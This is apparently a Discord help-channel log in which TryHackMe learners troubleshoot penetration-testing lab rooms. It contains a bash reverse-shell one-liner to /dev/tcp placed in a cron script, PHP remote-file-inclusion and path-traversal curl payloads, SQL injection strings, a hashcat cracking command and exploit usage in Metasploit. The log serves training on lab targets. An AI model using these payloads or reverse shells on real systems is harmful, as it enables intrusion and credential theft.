Burp Suite Intruder Task 10. Input the word lists and ran. Attack has completed but found no success. Is this a bug? Currently trying the cluster bomb attack in case it's mixed a username/password during its build.

congrats!

you might have more luck asking in the room-help channel, Juice Shop isn't part of the jr pentester path

I just checked and found it with the pitchfork attack. Make sure you have usernames set as payload1 and passwords as payload2. And when you look for a result, try sorting by Length to see if you find one that is different from the rest. All attempts will get a 302 redirect code regardless of their success, but a successful login will get redirected with a cookie attached.

I have mine setup like this, and tried it several times. All requests respond with 302 status and size 674.
Just terminated the machines and gone again. It has worked this time 👍. Thank yoi

glad you got it sorted! since it resets what user works when the machines start up, definitely worth restarting a machine. I've had fewer problems here, but frequently on HacktheBox I am at the end of my wits trying to figure out what I am doing wrong, restart the machine, and suddenly what I did just before works. 🙃

Hello, how to start pentesting? I am new here !

hi @half elbow , you can do some tryhackme rooms, and to unlock all the content, you can buy to have all unlimited

is that your actual name or a Fringe reference ? 😎

#web-fundamentals-path message

gpedit.msc -> computer config -> policies -> windows settings -> security settings -> account policies -> password policy -> password must meet complexity requirements

When enabled, this setting requires passwords to meet the following requirements:

Passwords may not contain the user's samAccountName (Account Name) value or entire displayName (Full Name value). Neither of these checks is case-sensitive.

https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/password-must-meet-complexity-requirements

Thanks for the info, I have solved it with reg in CLI

Gave +1 Rep to @ancient marlin

can you help me to fix it ?

the tool is for searching public information (OSINT) of the domain on the internet,

you were testing against a local domain which have no access to the internet (THM machines cannot access WAN), so it won't leave any records on OSINT sources, thus you can't get any result.

Try to use the tool on some public domains and it will work

I tried my best to fix this tool, for me it didn’t work with any domain, no matter how popular, I tried removing the virustotal portion of code, etc. in my research I found people with the same issue dating back to 2021, no fixed have been proposed, so it seems the tool is simply deprecated.

I see, subfinder from Project Discovery is a good alternative though

There is an underscore in your request, instead of a hyphen Content-Type:; that's why the curl and subsequent requests were not successful.

Start the attached VM from Task 3 if it is not already started. On the AttackBox, open the terminal and use the telnet client to connect to the VM on port 80. What is the name of the running server?

what am i doing wrong

did it close the connection immediately? normally once it shows the "Escape character .." bit you should be able to enter "GET / HTTP/1.1" and get a response back that reveals the server info. I just tested it and it worked for me in the attack box, though it was a bit slow to respond to the get request (or maybe I'm just impatient early in the day)

ohh i am supposed to write that? i thought it would appear by its own. now thats mb

ah yes, that's the problem then. when you put telnet IP PORT it establishes the connection and then waits for you to tell it what to do

gotcha thanks @amber scarab

Gave +1 Rep to @amber scarab

no problem! happy hacking 🙂

can u explain to me why email=x , password=x ,cpassword=x what 's does it mean x ? and tell me why we are usually adding additional headers to the request.??

It means that email, password and cpassword in that case don't matter as far as you want to enumerate username.
Additional headers to request needed in order to tell backend application that request was formed by web-form (in other cases request may be not accepted).

@turbid patio you there?

did you get the priv esc on 9?

or do we have to go throught the wildcard route?

use chmod to make the script executable

Hello

the part I stumbled up on is

just the one question

from memory (away from computer) the command that should end in > ls

No idea why it's not correct

even checked some write ups they all agree on the answer

you saw my forum reply then? dman

no wonder it's a ghost town everyone is here haha

I have 2manydiscord

Hello guys,
In Linux privilege escalation > Capstone challenge , i have a problem. I try to use a exploit from exploitDB but without success. Someone can help me to anderstand how i can make it work please ? (It is CVE-2017-1000253)

I have try to put the part between /** **/ in a file and execute it. And After, compile the exploit with : GCC exploit.c -O exploit. And run it

I do not remember this kind of CVE in any room. Are you sure it's correct CVE?

@tranquil citrus it is for escalation privilege of the linux box. Linux 3.10.0

And when i look the linux's version of this box, i find 3.10.0 too

hi all

@turbid patio my bad every one has a different schedule

@prisma coral did you get it

hi guys, can i ask question to jr pentester path here , or i should put it on room_help only?

ask? 😉

task 3 question 4, walking an application, room

It ask to fetch flag from framework site. i have put the name of file and found. but it doesnt seem the flag.

uhm which section is it?

got it sec

well, the flag is inside the zip file

double click or unpack it, there is a txt file

you find it inside

so the task ask us to get to framework site, once you get to that. it give you path as tmp.zip
after going to that path.

the whole page shows one line thm stat** lab*
nothing else.

ehm, no, you have to put the tmp.zip behind the target machine adress

http://IP/tmp.zip

ohhh

alright.

got it .

thanks a lot xD

yw ^^

took me like half an hour to figure this shit out xD frustated xD

well, the section is a bit strange, but the following ones are pretty cool

i hope so xD
idk why they had to make it complicated sometime xD

🤷‍♂️

i looked up writeups for task 9 in linuxprivesc and they all seem to say the same thing which didn't work for me

what task is that? im atm in a room, perhaps i do remember the problem

echoing bin/bash to another command

to get root shell

oops dammit

its in the comp[lete beginner path

im an idiot haha

dont mine me

ehm like piping? that would be like for example .. ls -al | grep "what you look for"

something like that?

nah like echo "/bin/bash" > YOURCOMMAND

sorry for slow replies, had to do some work

To start the junior pentester path do i need to learn web development ?

I have completed pre security and introduction to cyber part and it's suggesting me to go for junior pentester path

I would recommend Complete Beginner Path

I have gone with a few but i am not getting it

Yes I completed that

Both certificates i got

It should be ok then. Go with this path

Yeah but i am not able to understand it

So should I try first soc1

Where are you stuck?

Actually I am able to goo as they ask but technical way i can't think like by my own

That's very different from this path. Soc is more blue team oriented

While answering i sense where to find and i get it

Ohk so you mean while doing will get understanding

Like a bit bit

Just take notes and if you still don't understand, google it. It happens to all of us

I mean, not the answer but the explanation of how that works

Yes cause I am even learning from Coursera like Google cyber security profesional one

I am gaining knowledge from as many parts i can

Cause I am non IT guy

Let see thanks a lot

you dont have to force yourself to think by your own. for now just try to get what ever it is. the thinking part comes when u become little bit practicle. such as starting using tools.
if u already completed intro to cyber and pre sec. u r good to go for jr pen test.
best of luck

Yes I am doing that right now

Thank you

Maybe Kernel exploit isn't one you look for

@tranquil citrus hello 🙂 what do you mean?

Hi guys, I'm stuck here
Looking at the page source of our Acme IT Support website (http://MACHINE_IP), you'll see a comment at the end of every page with a page load time and also a link to the framework's website, which is https://static-labs.tryhackme.cloud/sites/thm-web-framework. Let's take a look at that website. Viewing the documentation page gives us the path of the framework's administration portal, which gives us a flag if viewed on the Acme IT Support website.

Answer the questions below
What is the flag from the framework's administration portal?

did you even click on the administrator portao

@turbid patio lol are u up?

tottaly different schedules lmao

@flint yew did you finish the priv esc?

@covert sun do you still need help??

Yes i do..

what module you on?

im in genreal vc if you want to hop in

okay, i'll hop in now. thanks

Gave +1 Rep to @median garden

np

anyone there that can help me?

Joined tryhackme and on the junior penetration tester path. My question is how do y’all remember and track back to the previous modules and rooms you have done . I mean, my goal is not just only answer each question and clear rooms , get the certification to , ultimate goal is learning , digesting and make it part of me and never to forget . Any recommendations?

I mean that you may try other ways to get in

Take notes on everything basically

Thank you , might as well do a physical note and with software application as well

Gave +1 Rep to @zealous dew

You could do physical for some things that are more theory-heaby, sure, but you're going to want some application for sure - there's tons of commands to learn, best to have a place to search for them and copy and paste

make notes in markdown and you can upload them to your github repo

you tlaking about the polkite exploit?

That’s a great suggestion and with the application it could help with like screenshots as well which can help with the commands

@median garden yup.. however I do rotating shifts so we will probably line up some days

which book would every hacker read to know good things or most of it during hacking or pentesting

if u know pls let me know]

i doubt everyone would agree?

but there's one thing I reckon everyone should read

https://inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf

from Phrack 49, "Smashing The Stack For Fun And Profit"

I don't code in C at all and it's still really good

and I still refer to it every so often

Lmao

hey, Im at Privilege Escalation: Cron Jobs and I finished the tasks without using a reverse shell, because I couldnt manage to establish one. I adjusted the backup.sh as shown in the room (exchanged host address to my atacker machine ip/port) and just nothing arrives at my listening server... any hints? i dont really wanna move on until I know how to get that reverse shell 8*( .... Or am I even supposed to find other ways than a reverse shell to finish the task? This way I would have done everything right I guess :-D

ls -lah backup.sh

and tell shadow what is wrong

I recommend using obsidian to take notes in markdown

Good recommendations but I Tried it once but seems too complicated. Maybe I need to put more time on it

Then i suggest notion, its much more simple

@wet reef u on? Did you figure it out?

sadge

any night owls?

Naah try Cherry Tree. A lot of people use it. It's not complicated to use and it gives you a lot of organization

hello can u explain to me why we choosed four ../ in ../../../../etc/passwd

hey guys, wd up.
i am in the last task of subdomain enumeration.
i m following the right IP and the command to find wordlist but not getting any response.
is ther something i am missing ?

or how do we know how to choose the number of ../

it indicate th path , the longer the path the more use of / in it.

how can we know the path when we don't have the hearchi of the whole pathes

what room is it ?

File Inclusion

task

4

i didnt get to that yet sorry

i get it dw

You could use another command like pwd to see in what path you are

in the url you forgot " // " after http:

i put that still no result

Ah now I see, there is a error message after your command. It says that the file doesn't exist

the wordlist

yeah it says such directory doesnt exist , so shoud i change anything ?

Probably just that specific file doesn't exist in that directory

try with another wordlist

can you guide me how can i do that ?

are you using the AttackBox for that task?

yes

well it doesn't matter, I just checked and the "namelist.txt" should be on every machine

can you send a screenshot of the content of the DNS directory

i m not able to find any directory lol

how could it be

now the content of the wordlists directory

you're typing "worldlists"

holy sss

try again to see if it works

same stuff

do you have something in the wordlistsdirectory?

I would suggest to restart the AttackBox and try again

there are files thou

yeah I see, you're typing "SecLists" wrong

Man it took me so many screenshots to see the mistakes

yes i figured that out xD

use TAB to autocomplete

so you don't make those mistakes

sorry man , let me run the main one then

actually i am not able to copy and paste to attachboxes and have to type manually

yeah you can. On the left side of the screen there is a clipboard

You can paste it there and then to your attackbox

ahan alright. thanks man, let me run it then

that thing on the left is the control bar and there you have the clipboard also

ya got it. thank you man

np

hello

i need help im in
pentest jr
room subdomaineemnumertion task 4

the command dnsrecon not work with me

Hey, thank you ... I added execute permissions on an earlier try but I must've done another mistake back then, because now it worked perfectly :)

Gave +1 Rep to @sage current

night owl? I was at work already :-D

no problem and glad you could figure it out

i need to click there ?

no to run it in attack box ?

Hi, I'm in the Linux Privilege Escalation room currently and there's this cronjob part that just doesn't seem to work. Idk if its a bug but the cronjobs won't run properly for me

Here's what I put in the 'backup.sh' file:

#!/bin/bash

bash -i >& /dev/tcp/10.10.199.192/1234 0>&1

run ls -lah backup.sh

and then tell shadow why it is not working

this is a good lesson to learn about a specific permission bit

-rw-rw-r--

do i have to chmod?

can root run executables that are none excuatable??? the answer is no
how can you fix it??? yes chmod

Ah okay thank you, I'ma try to make it executable and update you

good luck and have fun

@sage current Thank you, this works for me!

Gave +1 Rep to @sage current

no problem

you just learnt a valuable lesson about linux file perms

it is a very very common thing to miss until you learn about it

Yeah it went over my head totally

o nm

So im in the file inclusion room (https://tryhackme.com/room/fileinc#) trying to go the last challenge where you have to use an RCE and then an RFI to execute hostname. I've been on this for like two days, I know what I need to do I'm just trying to get it to work. Following walkthroughs as well and doing exactly what they say but I just can't get the output onto the website

Spoilers below:

||I'm currently running a python default web server and it's serving the file (which is also accessible from the public internet, i can access it from my main pc).

My current php payload looks like this (because the walkthrough i was going through put exactly this):

<?php
print exec('hostname');
?>

But I have also tried:

<?PHP print exec("hostname"); ?>

and

<? PHP print exec("hostname"); ?>

However, when put the url IP:PORT/cmd.txt (accessible from the public internet) into the search box on the website (but also the file parameter in the URL), it does not show anything in the content preview. I have tried looking at the network requests and going through all the html. I have also tried changing the extension on the file to .php and using a raw paste on pastebin

Does anyone know what I'm missing here?||

Looking at the output from the python server it doesnt look like the tryhackme server is actually sending a request

The current url im using is http://10.10.238.213/playground.php?file=http://34.251.5.186:8000/cmd.txt (but ive tried a bunch of variants such as without the protocol, using a different file extension after copying etc). And i know http://34.251.5.186:8000/cmd.txt works because i can access it from the public internet on my normal pc (im using a kali box on tryhackme for the hosting)

(all of these IPs are either the tryhackme machine or the tryhackme linux box)

Okay I've tried using shell_exec() as well but it also doesnt work, tried on the server and pastebin

i think the issue is that the backend for the website isn't making a request to the endpoint at all, since the IP address never shows in the logs of the python http server, only mine and the kali box's

im on /playground.php im like 99.9% sure this is the one with the RCI since I can add in remote files from the machine's server (i can put in the url for any of the labs into the playground page and have the PHP for that page inside the main page)

maybe there's an issue accepting traffic from IPs that aren't the machines?

im not sure, kinda want some input on this because im like pretty sure im wrong and this is designed to make you try a bunch of things before getting the right answer so

In those boxes you are usually meant to host the files yourself with a simple python server for example and then use the ip of the attack box and not something on the open internet

I'm using the IP of the attack box, I was saying that I knew it was accessible because it's also on the open internet

I can try local IP give me a sec (im still not exactly sure how the VPNs work so)

The ip should be 10.10.x.y or 10.9.x.y

You are using the public ip. Try ifconfig and see the right ip there

why does thm does not recommend "script kiddie"

ty, giving me a parsing error but I can work it out from here now that I got it on there

kinda forgot about private ip in this case so ty

Gave +1 Rep to @restive sage

if you mean as like a term in general, probably because it puts down people who are trying to learn

especially in hacking, you're gonna be using a lot of tools and automation, and a lot of times "script kiddie" is used for someone who doesn't know what they're actually doing and just using code snippets/tools they find online

so especially when you're learning hacking, calling someone a "script kiddie" can make them feel like they're not actually learning anything (and thm is a learning site and they don't want people to feel that way)

Can anyone tell me how to crack this hash and salt with john?

hash: 0c01f4468bd75d7a84c7eb73846e8d96
salt: 1dac0d92e9fa6bb2
I already know it is a md5 where salt is before the hash.

I have tried commands without success... My file contains 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2.

I already know the password it's in the wordlist i provided, but cannot find a working command...

I found a hascat code that worked, but want to know how to do it with john:

hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt

why is it taking forever?

-p- will scan all 65535 ports

how long will it take

some longer time for sure

like 15ish min or more depend

ah okay

You can use john --list=subformats to list and then use john —format=dynamic_xy to tell john which format it is

😭 its actually taking forever now

might better without -p- then

lemme give it a try

and put -vv at the end

gotcha

😔 its showing me only 5 ports after scanning, but i can tell by the question there is more than 5, s i think im gonna re scan it with -p-

can you pls link the room that you doing

https://tryhackme.com/room/netsecchallenge

then try with -p- and also leave -vv at the end

okay gotcha

if you just wanna list open ports, try

sudo nmap -p- --min-rate 10000 -vv $IP

It will finish in 30 seconds

i also want to see the hidden flags in server headers

Well, you can list open ports first then do

nmap -sVC -p xx,xx,xx,xx,xx,xx -T4 -Pn $IP -vv

That will be faster, i think

min-rate flag was helpful

I ran this and i got the output nmap -sC -sV --min-rate=1000 -p- 10.10.65.225 -vv

10000 not 1000

Nc ^

Did you get an answer? I am stuck in the same place; I get no results for task 6.

for me it was that SecList was in lower case

Try this:

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u {Machine_IP}

hmm, for me the list is SecList, lowercase is not existent in my AttackBox. I now seem to have other issues. I wanted to terminate the target machine, it says it was terminated, but it is not. So, it may be the target that's acting up. Looking for help on how to force target shutdown. I appreciate the response!

Send some screenshots so we can help you better

you can add --stats-every= to have it print an update to the terminal at certain intervals to see how it is progressing. I'm impatient so I use this all the time with --stats-every=5s you can also push any key to get it to print a short update showing what % is done etc

Linux Privilege Escalation - Task 10 - Subtask 2 - Hint
"You can add the writable directory to your user's PATH and create a file named "thm" that the "./test" executable will read. The "thm" file can simply be a "cat" command that will read the flag file."
What does this even mean? I can create a file called thm that the ./test exe will read? What does that mean? It doesn't read anything. Then you can change the thm file to a cat command how what is the hint talking about bro? What is the stupid thm got to do with that at?

karen@ip-10-10-214-1:/home/murdoch$ ./test thm
sh: 1: thm: Permission denied

My guy what do you mean?!!?!?

It aint reading anything.

I've already added ||/home/murdoch|| to the path but now what?

Solved it, I got the machine all confused:
I was in a bash shell that couldn't run the ./test file correctly, this is wrong here -> karen@ip-10-10-214-1:/home/murdoch$

i think that capstone challenge room is not working
I am trying to ssh but it is going on time out

┌──(parallels㉿kali-linux-2022-2)-[~] └─$ sudo ssh leonard@10.10.201.246 ssh: connect to host 10.10.201.246 port 22: Connection timed out

working now

Hey there, for the boolean sqli task, it tells you to keep trying admin123 UNION SELECT 1,2,3 where database() like '%';-- with different letters added in front of the % until you get the full database name.
Is there a way of telling that you have reached the end of the database name besides none of the possible characters returning true?

Why fo you think username will be admin123?

that part is irrelevant for the task, it's written in the task description to just keep using it 🙂

The first part is wrong so that with the help of the union statement, the second part has to be true in order to return true. With that, we can start to figure out the correct payload for the task. That's why we chose admin123 deliberately because we know it is wrong.

You can try “where database() = ‘yourguess’; — “ and if it returns something you know it was the full name

@real shard

Hm, okay. Thanks for the reply 🙂

Another thing, for Burp Suite: The Basics on Task 7, question 3.
I know where the "Updates" sub-category is, but the base category for that does not seem to be the correct answer?

yeah things have changed so that room probably needs an update

Thing is, the solutions I found online used where it is for me as the answer. But apparently that is wrong, since the question expects a 5 character answer.
Kinda bugged by this, I don't like seeing it not solved :^)

Oh, thankfully you can see the correct answer in the screenshot of that task at least 😄

Hi, im doing task 3 of file inclusion challenges, and I'm stuck at it. I had no idea how to complete so looked it up on youtube and on this discord and noticed many using this: curl -X POST {IP} -d 'method=POST&file=../../../../etc/flag3%00' --output - . Can someone explain how this works? In particular the method part, where does this come from?

it works without the method=POST part, there is no reason to add this parameter

what is important is the -X POST, sending a POST request instead of a GET in this challenge makes the request go through

I see thanks

also im trying to do the RFI, but it keeps telling me the file isnt found. You happen to know why?

nvm got it

hello everyone, I wanted to know why the gcc line didn't work when you put any words (exploit, ...) and as soon as you put pwned instead it works. It's in the room: Linux Privilege Escalation part: Privilege Escalation: Kernel Exploits. Thanks in advance

That error message implies you somehow typed a non-printable between the - and the o the first time, did you type some kind of Unicode - or maybe paste it somehow? Basically it didn’t get the -o correctly so the command line parser treated ‘exploit’ as an input file instead of an output file, and the file ‘exploit’ didn’t exist to read.

Hi all, i did the metasploit module and i have a question. I did the ms17 exploit with the attack box, working well. I did the same with my own VM and the VPN THM. the exploit start well conencting to the targer, exploiting but the reverse did not work. How can i tell to msf that i want to use the interface tun01

Hello, you have to set the lhost, this is your address

you can set LHOST to an interface name. That exploit seems to get flakier with high ping.

You can use directly the interface as a parameter, for example set lhost tun0

ok i did it with the IP does not work, will try with TUN0

same thing waiting sending all but last fragement of exploit packet

If you did not restart the machine from the last time you exploited it, is possible to not work because of this. The exploits from metasploit are not working all the time, even if the target is vulnerable

i have two screen on with the local attack machine working fine and an other with a virtual box vm, maybe it is because of the interfaces in virtualbox

or the fw in place in my office

So if you are using both Attack Box and your own vm in the same time, I think if you already exploit the machine with the Attack Box, a second exploit could not work. Try restarting it and use just your vm.

ABdy i did that i'm pretty sure now that i'm not allowed to use the 4444 to go out

If the port is already used, yeah, you have to set other for a session

i changed to lport 443

restart the vuln machine

Is working now?

waiting for the vuln machien IP 🙂

not working but it's better

now i have a permission denied to bind to ip:443

You need root perms to bind to port 443.

that's it

working fine with root

that was because of lport (4444) not allowed

tks a lot for your help

thank youu !!

Gave +1 Rep to @trim cloud

In the vulnerability capstone challenge, got a rev shell using exploit.py.
When connecting to local machine via nc local_ip local_port connection succeeded but commands didn't seem to work

why is this happening ?

It's probably something like 'whatever command you ran for the revshell actually connected but the input or output of the shell is not actually connected correctly'.

e.g. the io redirections on a bash one-liner not being exactly correct, or the exact version of whatever utility used is the wrong version to support something, etc.

what might be done in this case ?

I don't think you actually need a full reverse shell to get the flag for that room.

Take that and run with it? 🙂

it returns "system" for every command executed

if you're using the same exploit I used, that's because it doesn't actually really parse out the command result very well. But you have the script, you can modify it.

alright, thanks @trim cloud

Gave +1 Rep to @trim cloud

that's a great tip! thanks

Gave +1 Rep to @amber scarab

Hey I have a quick question. I am in the third part of walking a web application and the Question asks, What is the directory listing flag? I have been here for about an hour before I started to seek help.|| One site advised to type in assets after the url from the home page, and they got it from inspecting the view source code, but when I read it, I would have never thought to just type in assets after the url. Intuitively, I would have typed the entire thing out, in which I did to see what it gave me, and it only displayed the css code. But when I just typed in the url with /assets as the end, it gave me the directory path, which ultimately led me to get my answer. How would I have known to type that in? or is that common, where you would only look for assets or type the first word of the href stored link? I hope that makes sense.||

Trying to think of how to explain this. 🙂 || If we're looking at plain web server that is serving completely static content from a filesystem, the paths in the URL always match up to a path in the filesystem. So if you have a url that is http://TARGET_IP/images/somefilename -> that tells you that there might be a directory named images and you can try to request it with http://TARGET_IP/images/ ||

So really it's just about || 'let's pick apart the url path and try to request things and see if things are actually there'||

||Now, it is not always the case that a server will serve from a fileystem and that the URLs will map to filesystem paths - a lot of the REST-style apps being built today are just a handler and some code that routes things to that handler -> but even if you are poking at an app like that, the fact that you have a url like http://TARGET_IP/some/long/pathway/to/something tells you that there might be something at any place you cut the '/', if that makes sense (e.g. you might want to poke at http://TARGET_IP/some/long/pathway and see what you get back, or http://TARGET_IP/some/long/, etc.)||

Done

@prime tree, I'm sure upper message requires mod team intrusion

Not sure if you meant my messages and I tried to explain in a ‘this is how things work’ way and not a ‘this is the answer to the room way’ but hey, I threw spoiler tags in just in case.

It was some spam in channel, so I call the mod to get rid of it. Spam was deleted but not my message

Figured it might be that too. Thanks!

Gave +1 Rep to @tranquil citrus

Just joined the other day and got paranoia that I was unintentionally doing something wrong.

Good day all! wrapping the Acmeitsupportv10 room (Developer Tools - Network). and it is not accepting the flag found in the response.. Any suggestions?

disregard... found the real flag.. LMAO

is there anyone can study with me?

Wdym?

Junior-pentester-path is tuff cause I am not a developer is it the reason or its just for over view like somepart from logical way I can do but some I have to go to youtube to understand

File inclusion part was tuff for me cause I don't know php and curl so should I study that first then continue or just go forward

You can use automated scripts like dirbuster + seclists to find entry points. I would also suggest learning burpsuite as fast as possible because it makes it much easier to web exploit. You don't need to know that much PHP/curl to exploit LFI, but it is a plus.

Yes burp suite is more further like few more left tasks to complete after that it is there

And even if I am trying to learn soc 1 then to this few paths are in there after that only I can move further

I am just getting concepts at the moment let see where it takes cause I am non IT person that's the reason I guess I am feeling tuff trying to switch carrier so let see thanks a lot @modest arch

Gave +1 Rep to @young spade

You don't need any dev skills for that. Modifying Python scripts isn't dev skill at all

It wasn't python the file inclusion part was php and as for dev I am just worried like I think to break I need to know how it's made and thanks a lot @tranquil citrus I am also learning form course cybersecurity professional one in coursera there is python once I learn might help

Gave +1 Rep to @tranquil citrus

Don't worry you'll start to learn development on more advanced levels of Infosec

Yes

Hey how did you know to navigate to tmp.zip? Wondering if I missed something..

when you visit the product website, it says there is a bug you can download a tmp.zip

The Acme IT support page?

Or the Framework page?

Oh wait nvm I just found lol. Thanks!

yw ^^

anyone here to pick at their brains? im stuck -_-

step one get some oil

step two oil stuck part

JR Pen> Metasploit>Exploits> Task 5

step three fly out of stuck

hahah

okay on a more serious note what are you not getting???

so im trying to run my exploit....

and it fails in metasploit

my target host and my local host is all good

not sure whats going on ive even checked out some vids on youtube and im doing everything right is seems?

can you run show options in metasploit and show a screenshot of what it outputs???

set a payload and multihandler, happens to me as well

the payload has to match msfvenom

ohhh maybe thats whats happening!

yep ive been dealing with this for 2 days

try setting payload first, then set multihandler and then set payload again

what the heck is the multihandler? lol

think nc -lvnp 1337 but for a lot of differnt types of reverse shells

and it is not relevant to task 5

let me get a screenshot and send it over @sage current

try using the attackbox, it might be failing on the vpn which often times happens

im kind of thinking thats whats happening... my local host was set to some thing different originally so i changed that accordingly, but im sort of stumped

im pretty sure im using the right vuln ... everything seems good, target host, lhost etc etc

when i enter: ifconfig everything seems good as well

ill try the attackbox and see if i can get it to work in there... @sage current if you have any other recommendations i appreciate that

thanks yall 🫡

you might need to restart the target machine as eternal blue can cause it to crash if you are unlucky

but your settings seems correct

yeah i should try that too. ill update here in a few. fingers crossed

im in TY ❤️

thanks @sage current

Gave +1 Rep to @sage current

no problem

+rep @modest arch

Gave +1 Rep to @young spade

@sage current i sent you a private msg can you check ? noob question

yes generally

Hello all. Just doing the Net Sec Challenge and the final question, no matter what scan I do, the web site doesn't display a message

Was doing it from my Kali machine, then tried the Attack Box and still nothing.

No worries. Shut everything down and tried again on attack box and it worked.

Hello everyone 🙂 I have problem with SQL injection in part Burp Suite: Repeater task 8
I wanted to go time based sql injection so i tried

GET /about/2 UNION SELECT sleep(8),2,3,4,5 ;--

and it works, then i tried

GET /about/2 UNION SELECT sleep(8),2,3,4,5 WHERE database() LIKE 'p%' ;--

And no character works for that😞 i tried alphabet and numbers

hello guys can anyone of you explain to me how can i get the table_name or how can i know that the variable has name as table_name in SQL injection room !!!

and after it changed to columns_name how did he know that the variable has these names

information_schema.tables have information about tables in database. It contains names and a lot more. In this query you're asking informaton_schema about names of tables in this database. Same with information_schema.columns. I've read that most of database systems contains information_schema, so group_concat(table_name) should work often in this type of attack. I hope i have helped you

okay thank u for this help

Gave +1 Rep to @gleaming crane

Anyone ? 🧐

Why does my traceroute results on tryhackme.com show only 10 hops & I have seen in others that they get 14 at once & also 28 hops?

Are you in the same building with others who try? I belive number of hops depends on your location and IPS.

"A popular tool for Blind XSS attacks is xsshunter. Although it's possible to make your own tool in JavaScript, this tool will automatically capture cookies, URLs, page contents and more."

XSSHunter is now deprecated.

Someone help in Authentication Bypass module task 2

getting this error using attack box

Nvm got it

task 3 didnt find any passwd

what usernames you have in valid usernames file

admin
robert
simon
steve

But I got it thanks I had separated them by enumerating them for some organization reason so I took them out and rotated them again and it worked

great

Hey guys just got some question,how to access VM with OpenVPN ?

!vpn

There is an easy room telling you the steps.

wich one ??

Which ever OS you use

@remote iris youre a room tester right? can you do sumn about this?

I've forwarded it on to staff, someone will pick it up soon, thanks for reporting.

Gave +1 Rep to @manic cairn

in hindsight, it seems like someone has uploaded xsshunter code onto github, so i think its still possible but its not so user friendly anymore